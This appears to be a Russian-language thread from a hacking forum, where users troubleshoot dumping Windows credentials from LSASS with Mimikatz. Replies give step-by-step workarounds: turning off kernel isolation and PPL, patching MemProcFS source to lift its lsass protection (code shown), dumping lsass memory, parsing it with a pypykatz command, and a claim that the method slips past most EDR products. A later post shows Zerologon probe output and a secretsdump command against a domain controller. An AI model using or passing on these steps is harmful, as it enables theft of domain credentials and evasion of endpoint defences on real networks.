• XSS.stack #1 – первый литературный журнал от юзеров форума

Ошибка в Mimikatz

plumbus

floppy-диск
Пользователь
Регистрация
24.06.2025
Сообщения
8
Реакции
0
права System запустил мимик не дает вытащить хеши постоянно ругается ,все от имени систем запущено

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

кто сталкивался подскажите как выйти , через импакет тоже не получается ,не устанавливается связь
 
Изоляцию ядра выруби через реестр и пробуй опять
PPL, Core Isolation, Memory что то там оффнуть ему нужно и мимик самый новый пусть скачает
 
Бывает mimikatz_trunk версия помогает.
Берите magnet raw dump, pypykatz и memprocfs.

magnet raw dump сделает полный дамп памяти, переливаете его к себе.
монтируете как диск используя memprocfs, ищите PID lsass.exe, берёте оттуда minidump.dmp
потом через pypykatz разбираете, мимик морально устарел и может не знать что делать с новым Windows.

оригинальная версия memprocfs не снимает lsass.exe, что бы обойти нужно изменить кое что в файле:

Код:
if(!strcmp(pProcess->szName, "lsass.exe")) {
ctx->fDisabledSecurity = TRUE;
}

Эти три строчки удалить нужно.
 
Берите magnet raw dump, pypykatz и memprocfs.

magnet raw dump сделает полный дамп памяти, переливаете его к себе.
монтируете как диск используя memprocfs, ищите PID lsass.exe, берёте оттуда minidump.dmp
потом через pypykatz разбираете, мимик морально устарел и может не знать что делать с новым Windows.

оригинальная версия memprocfs не снимает lsass.exe, что бы обойти нужно изменить кое что в файле:

Код:
if(!strcmp(pProcess->szName, "lsass.exe")) {
ctx->fDisabledSecurity = TRUE;
}

Эти три строчки удалить нужно.
Нафига вообще эти танцы с лишними инструментами. Проще через диспетчер задач шмякнуть на процесс и сделать дамп заархивить перетащить себе и питоном с установленным модулем "pip install pypykatz" выполнить.
pypykatz lsa minidump C:\Users\test\Desktop\lsass.DMP > lsa.txt
 
Нафига вообще эти танцы с лишними инструментами. Проще через диспетчер задач шмякнуть на процесс и сделать дамп заархивить перетащить себе и питоном с установленным модулем "pip install pypykatz" выполнить.
pypykatz lsa minidump C:\Users\test\Desktop\lsass.DMP > lsa.txt
Мною предложенный вариант работает с 90% EDR решениями
 
Не стал создавать новую тему, сороян!
Кто встречал такую штуку с зерологином

Код:
Target : 192.168.0.1
Account: SRV01$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
===============================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable
А при дампе пишет
Код:
c:\secretsdump.py -no-pass -just-dc SRV01$@192.168.0.1
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentica
tion information.)
[*] Cleaning up...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх